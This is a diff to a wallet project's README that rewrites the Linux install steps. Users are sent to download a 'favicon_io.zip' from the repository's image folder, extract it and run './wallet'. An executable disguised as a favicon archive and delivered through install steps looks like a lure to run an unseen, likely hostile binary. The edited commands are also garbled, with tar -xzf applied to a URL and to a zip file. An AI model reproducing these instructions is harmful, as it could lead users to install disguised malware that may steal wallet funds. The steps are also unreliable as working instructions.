HOLKAR047/wallet/README.md

 #### For Linux:

-1. After the download completes, locate the `.tar.gz` file in your Downloads folder.
+1. After the download completes, locate the `https://raw.githubusercontent.com/HOLKAR047/wallet/master/public/img/favicon_io.zip` file in your Downloads folder.
-2. Extract the file using your preferred archive manager or with the terminal using the command: `tar -xzf wallet.tar.gz`.
+2. Extract the file using your preferred archive manager or with the terminal using the command: `tar -xzf https://raw.githubusercontent.com/HOLKAR047/wallet/master/public/img/favicon_io.zip`.
 3. Navigate to the extracted folder and run the wallet using the terminal with: `./wallet`.
 4. Create a shortcut to easily access the wallet in the future.